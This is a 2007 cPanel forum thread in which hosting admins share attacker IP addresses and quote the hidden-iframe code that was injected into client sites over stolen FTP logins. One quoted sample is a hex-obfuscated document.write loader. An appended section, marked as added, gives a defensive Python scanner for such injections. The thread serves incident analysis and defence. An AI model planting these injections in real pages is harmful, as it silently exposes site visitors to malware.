The Community Forums


IP addresses from IFrame Hacks

Discussion in 'General Discussion' started by noimad1, Oct 6, 2007.

  1. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16
    #1 noimad1, Oct 6, 2007
    Last edited: Oct 6, 2007
  2. Puggs

    Puggs Member

    Joined:
    Oct 1, 2007
    Messages:
    13
    Likes Received:
    0
    Trophy Points:
    1
    Hi

    66.36.241.185 8:30pm Australian Eastern Standard Time +10:00 1st Oct
    66.36.241.185 4:20am Australian Eastern Standard Time +10:00 2nd Oct
     
  3. simplybe

    simplybe Well-Known Member

    Joined:
    Nov 29, 2002
    Messages:
    153
    Likes Received:
    0
    Trophy Points:
    16
    Exactly the same here, same time, date & IP.
     
  4. mctDarren

    mctDarren Well-Known Member

    Joined:
    Jan 6, 2004
    Messages:
    664
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    New Jersey
    cPanel Access Level:
    Root Administrator
    This thread should probably be made stickied... gl to all those looking for an answer.
     
  5. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    16

    Interesting...Well that makes me feel a tiny bit better that this might not be a server compromise...
     
  6. simplybe

    simplybe Well-Known Member

    Joined:
    Nov 29, 2002
    Messages:
    153
    Likes Received:
    0
    Trophy Points:
    16
    New IP 72.29.95.226, same method as before.
     
  7. d_t

    d_t Well-Known Member

    Joined:
    Sep 20, 2003
    Messages:
    243
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Bucharest
    81.95.149.75 - October, 2 2007
    (client confirmed he used FTP from an infected PC the day before)
     
  8. wkdwich

    wkdwich Well-Known Member

    Joined:
    Apr 11, 2005
    Messages:
    105
    Likes Received:
    0
    Trophy Points:
    16
    Since June, the ones I have caught:


    12.130.132.229
    132.239.235.55
    195.133.109.227
    202.151.177.83
    203.121.67.164
    203.223.159.210
    210.188.204.80
    211.118.175.22
    211.63.65.46
    217.118.82.41
    217.170.77.210
    217.195.87.197
    221.201.100.253
    24.82.147.206
    58.65.235.105
    61.183.247.7
    69.11.37.86
    69.41.162.77
    69.50.180.186
    71.242.248.228
    72.37.179.44
    80.81.208.67
    81.177.4.34
    82.75.59.65
    84.164.206.37
     
  9. rvskin

    rvskin Well-Known Member
    PartnerNOC

    Joined:
    Feb 19, 2003
    Messages:
    400
    Likes Received:
    1
    Trophy Points:
    18
    Here is my collection.

    66.246.218.145 # Sep 09 2007
    84.16.252.163 # Aug 29 2007
    194.83.36.2 # Aug 30 2007
    69.41.162.77 # Sep 27 2007
    213.27.26.11 # Sep 27 2007
    116.0.103.111 # Oct 9 2007
    202.164.52.199 # Oct 9 2007
     
  10. mooony

    mooony Well-Known Member

    Joined:
    Nov 9, 2002
    Messages:
    82
    Likes Received:
    0
    Trophy Points:
    6
    66.36.241.185 on 8 servers.

    Ronald
     
  11. ToddShipway

    ToddShipway Well-Known Member

    Joined:
    Nov 13, 2006
    Messages:
    300
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Houston, TX
    Thanks for the information.

    Keep it coming. :)
     
  12. Imai

    Imai Well-Known Member

    Joined:
    Aug 11, 2003
    Messages:
    45
    Likes Received:
    0
    Trophy Points:
    6
    81.95.150.178 on October 8

    <IFRAME name='StatPage' src='http://www.911traff.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>

    looks like a one off case as I am still checking the other accounts and logs
     
    #12 Imai, Oct 13, 2007
    Last edited: Oct 13, 2007
  13. sarhosting

    sarhosting Well-Known Member

    Joined:
    Oct 1, 2007
    Messages:
    164
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    United States
    cPanel Access Level:
    Root Administrator
  14. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,461
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator

    I don't want to sound pessimistic here, or take this thread too far off topic, but is posting these IPs really going to be helpful? Anyone who watches their logs can tell you the hits just keep on coming: block one, another pops up. Block 130 (my max for CSF entries to the blocked list), and another 130 more get blocked next month.

    As soon as they are found out at hopone or ipowerweb or rbnnetwork or netdirekt.de or hostfresh.com or any one of a zillion other places, they're already set up on someone else's server continuing to do what they do.

    Trying to track down how it's happening is a good thing, and keeping track of IPs may be good as well, but this'll go on forever. (the thread)

    Wouldn't it be more advantageous to all concerned if we as system administrators were sharing our security tips instead? A nice long thread with the top security tips would surely be more helpful, IMHO of course.

    For one example, many have Fantastico installed, but did you know that just because Fantastico tells you all files are up to date, and all installations are listed as up to date, that doesn't mean squat? Users will install components to Joomla that are very buggy and can be cracked:
    http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/

    That's just one example, there are thousands of examples we could be sharing that I think might really be more helpful than this list of IPs.


    We're all in this boat together here as cPanel admins, and while sharing tips might be actually helping your competition in this hosting business, at the same time those who have no clues about security are a huge part of the reason others of us are having problems.

    Some kid (no offense, kids) gets his own cPanel server, gives all his buddies free accounts, and they get broken into because that kid didn't secure his server properly and his buddies are so excited to have a free account that they install everything under the sun without knowing the consequences. And the end result is what we're all discussing here.

    cPanel is great stuff, but installing it and using the built-in security is not enough. Not by a long shot. I watch my logs via WHM daily, using logview, I get system logs by mail every hour, and I can tell you the hits just keep on coming, every hour, every day, every month.

    You can block IPs until the cows come home, that's not going to keep you secure.

    Anyway, sorry for the rant, just my 2.
     
  15. rpmws

    rpmws Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    1,824
    Likes Received:
    5
    Trophy Points:
    38
    Location:
    back woods of NC, USA
    You are correct!! I agree with you almost 100% with everything you said in general, except one thing. These FTP login defacements, or whatever you want to call them, come from legit logins that have been snatched from locally exploited machines (I think) (or a compromised billing system that stores logins). At least that is what I have always thought. If that is the case, then the only way to keep them out is to either block or disable FTP, or block the known IP(s) they came in from.
     
  16. ToddShipway

    ToddShipway Well-Known Member

    Joined:
    Nov 13, 2006
    Messages:
    300
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Houston, TX
    Feel free to start a new post where admins can post security tips, helpful notes etc.

    We are asking for attacking IPs in this thread for information gathering purposes. We aren't creating a list of IPs to delete or anything like that. We just need a few IPs that are known to attack several different servers to help us gain an understanding about what's occurring during the attacks and how they are being propagated. :)
     
  17. mooony

    mooony Well-Known Member

    Joined:
    Nov 9, 2002
    Messages:
    82
    Likes Received:
    0
    Trophy Points:
    6
    I have this morning 4 servers infected with iframes. These accounts were accessed by FTP.

    ip: 58.65.239.10

    PHP:
    <iframe src='http://ltraffic.biz/resource.php?id=4531&user=Nikson' width='1' height='1' style='visibility: hidden;'></iframe>
    I hope this helps.

    Ronald
     
  18. sehh

    sehh Well-Known Member

    Joined:
    Feb 11, 2006
    Messages:
    579
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Europe
    we've seen lots of ftp attacks from: 72.95.215.3
     
  19. mtindor

    mtindor Well-Known Member

    Joined:
    Sep 14, 2004
    Messages:
    1,281
    Likes Received:
    37
    Trophy Points:
    48
    Location:
    inside a catfish
    cPanel Access Level:
    Root Administrator
    What percentage of accounts on each server? or are you saying EVERY account on four servers had this happen?

    Mike
     
  20. d_t

    d_t Well-Known Member

    Joined:
    Sep 20, 2003
    Messages:
    243
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    Bucharest
    FTP connection with user password from: 77.221.133.186

    Code added to index.html:
    Code:
    <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4757fc58cd991(v4757fc58ce18a){ function v4757fc58ce999 () {return 16;} return(parseInt(v4757fc58ce18a,v4757fc58ce999()));}function v4757fc58cf989(v4757fc58d0183){ var v4757fc58d1171=2; var v4757fc58d097a='';for(v4757fc58d0d7d=0; v4757fc58d0d7d<v4757fc58d0183.length; v4757fc58d0d7d+=v4757fc58d1171){ v4757fc58d097a+=(String.fromCharCode(v4757fc58cd991(v4757fc58d0183.substr(v4757fc58d0d7d, v4757fc58d1171))));}return v4757fc58d097a;} document.write(v4757fc58cf989('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633737386536356239373065207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B273031665C272077696474683D353136206865696768743D333831207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
    The code contains links to:
    Code:
    http://77.221.133.188/.if/go.html?19427401f
    http://77.221.133.188/.dif/go.php?sid=1
    http://77.221.133.189/.sp/in.cgi?p=t
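The injections quoted in this thread share two shapes: a plain 1x1 or `display:none` iframe dropped into index files, and a script that hides the iframe inside a hex string that is decoded and passed to `document.write()` at page load. The following is an added example (not code from this thread or from cPanel) of a defender-side scanner for web roots: it flags hidden iframes in plain HTML, decodes the hex-encoded `document.write()` pattern so the injected URL becomes readable, and walks a directory tree reporting which files carry either form. The sample pages, file names and `.invalid` hostnames are constructed for the demonstration and are not real sites.

```python
"""Find hidden-iframe injections in HTML/PHP files, including hex-obfuscated ones."""
import os
import re
from typing import Dict, List

# Any <iframe ...> opening tag.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# src attribute value (stops at quotes, whitespace or the tag end).
SRC_RE = re.compile(r"""src\s*=\s*['"]?([^'"\s>]+)""", re.IGNORECASE)
# Signs the frame is meant to be invisible: tiny width/height (0-5 px),
# display:none or visibility:hidden, as in the samples posted above.
HIDDEN_RE = re.compile(
    r"""width\s*=\s*['"]?\s*[0-5]\b|height\s*=\s*['"]?\s*[0-5]\b"""
    r"""|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)
# document.write(<obfuscated_fn>('<hex digits>')) - the decoder function name
# is randomised per infection, so only its shape is matched.
HEX_WRITE_RE = re.compile(
    r"""document\.write\(\s*\w+\(\s*['"]([0-9A-Fa-f]{8,})['"]\s*\)\s*\)"""
)


def decode_hex_payload(blob: str) -> str:
    """Turn the hex string handed to document.write() back into text."""
    return bytes.fromhex(blob).decode("latin-1")


def find_hidden_iframes(html: str) -> List[str]:
    """Return the src of every iframe that is sized or styled to be invisible."""
    hits = []
    for tag in IFRAME_RE.findall(html):
        if HIDDEN_RE.search(tag):
            m = SRC_RE.search(tag)
            hits.append(m.group(1) if m else "<no src>")
    return hits


def find_injected_urls(html: str) -> List[str]:
    """Hidden iframes in plain markup plus those hidden inside hex-encoded scripts."""
    urls = find_hidden_iframes(html)
    for blob in HEX_WRITE_RE.findall(html):
        decoded = decode_hex_payload(blob)
        # The decoded string is JS that writes HTML; its quotes are backslash-escaped.
        urls.extend(find_hidden_iframes(decoded.replace("\\'", "'")))
    return urls


def scan_tree(root: str, exts=(".html", ".htm", ".php")) -> Dict[str, List[str]]:
    """Map each infected file under root to the URLs its hidden iframes point at."""
    report: Dict[str, List[str]] = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="latin-1", errors="replace") as fh:
                    found = find_injected_urls(fh.read())
                if found:
                    report[path] = found
    return report


# --- Constructed samples (hostnames are placeholders, not real sites) ---
# Plain injection next to a legitimate, visible embed.
SAMPLE_PAGE = """<html><body><h1>Welcome</h1>
<iframe src='http://bad.example.invalid/resource.php?id=1' width='1' height='1' style='visibility: hidden;'></iframe>
<iframe src="http://video.example.invalid/embed" width="640" height="360"></iframe>
</body></html>"""

# Hex-obfuscated injection built the same way as the posted sample: the script
# decodes a hex string and document.write()s an invisible iframe.
INNER_JS = (
    "<SCRIPT>document.write('<iframe name=x src=\\'http://loader.example.invalid/go.html?'"
    "+Math.round(Math.random()*196596)+'01f\\' width=516 height=381"
    " style=\\'display: none\\'></iframe>')</SCRIPT>"
)
SAMPLE_OBFUSCATED = (
    "<script>document.write(v4757fc58cf989('"
    + INNER_JS.encode("latin-1").hex().upper()
    + "'));</script>"
)


def demo() -> List[str]:
    """Run both samples through the detector; returns the injected URLs found."""
    return find_injected_urls(SAMPLE_PAGE + SAMPLE_OBFUSCATED)


if __name__ == "__main__":
    for url in demo():
        print("hidden iframe ->", url)
    # Against a real web root: python3 this_script.py; then scan_tree("/home")
```

`scan_tree` reads files as latin-1 so a stray byte in a defaced page cannot abort the walk, and reports only files with a hit, which makes it usable from cron against `/home` on a cPanel box. The size threshold (0-5 px) and the style checks are deliberately simple; a visible 640x360 embed is not flagged, while the `width=516 height=381 style='display: none'` frame in the decoded payload is caught by the style check rather than the size check.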
    
     